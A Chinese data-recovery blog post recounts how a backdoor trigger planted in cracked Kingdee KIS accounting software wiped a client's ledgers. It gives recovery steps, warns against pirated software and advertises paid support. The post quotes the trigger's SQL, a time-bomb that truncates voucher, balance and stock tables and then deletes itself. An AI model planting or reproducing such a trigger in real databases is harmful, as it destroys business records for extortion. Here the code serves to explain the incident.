金蝶KIS专业版替换allinone和sxs.dll补丁(遭后门清空或破坏数据被修改为“恢复数据请联系”)
[重要通告]如您遇疑难杂症,本站支持知识付费业务,扫右边二维码加博主微信,可节省您宝贵时间哦!
近日在百度搜索来的一个客户,描述了一下自己用的金蝶KIS 12.2/12.3 专业版,网上下载的盗版,本想着用几年后就买正版或者找一个靠谱的版本使用,发现并无大碍,一直用到了2021年,用了近6年,2021年底早上进公司发现数据全部被篡改,如下图
数据恢复故障描述
看了一下客户的财务电脑,是XP的系统,果然很老了,被盗版补丁留下的后门入侵修改了所有数据,删除了所有备份! 毕竟做了这么多年的账,突然要付之东流,很是费解;
使用破解版财务软件,破解者破解后内藏了后门,清空所有数据的触发器。用了几年时间后,后门触发器被激活,删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目等,这样才可以所要更多的金额,说明做这漏洞的人,心机很重;
【临时处理方法】
此时建议立即停止SQL服务,分离数据库源文件,复制拷贝备份处理!切勿重装金蝶软件,切勿重装SQLserver!!如还原其他备份,需事先拷贝 事故后第一手文件,进行备份。不要用账套管理器进行备份,那样是没用的哦;
【数据恢复过程】
接到电话后,客户发来遭后门修改数据库文件,立即组织对数据库分析工作,发现数据库内有一个后门触发器 t_log_autoNumbe ,大致代码内容为:
if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1) begin if (@Flogdays>=15) begin TRUNCATE TABLE t_voucherEntry --删除总账凭证 TRUNCATE TABLE t_balance --删除科目余额表 if @FVersion=‘8.0‘ --版本大于8.0 TRUNCATE TABLE icstockbillEntry --删除存货出入库明细账 else TRUNCATE TABLE t_cc_stockbillEntry --删除出入库存货明细账 drop trigger t_log_AutoNumber end end GO
1.对故障盘进行全盘镜像,对mdf文件进行备份,防止二次造成破坏。
2.对镜像盘进行扫描重组,对删除的表进行字段分析。
3.对mdf进行底层数据分析,与表结构进行匹配。
4.通过程序的匹配,找到所有删除表的原始ID。
5.通过ID和新表结构,对数据进行提取,生成SQL 脚本。
6.把SQL脚本附加到新的数据库中。
7.把未删除的表的数据进行迁移。
【恢复结果】:发回给客户测试验收,反馈数据基本正确,能恢复这个程度,也实属困难,客户很满意!得到客户的极大好评。
【温馨提示】:使用网上随便下载的破解版软件,危害很大;居心不良的破解者,可能会留下后门木马,删除修改数据,敲诈钱财。如果商用,请使用正版软件;如经济实力不允许,也不要到处下载软件所使用;
PS:好好的软件,为啥免费?还不是为了后期让你缴费,说白了就是让你支付更多的钱财;1、正版 2、找有技术或者技术支持的;
问题未解决?付费解决问题加Q或微信 2589053300 (即Q号又微信号)右上方扫一扫可加博主微信
所写所说,是心之所感,思之所悟,行之所得;文当无敷衍,落笔求简洁。 以所舍,求所获;有所依,方所成!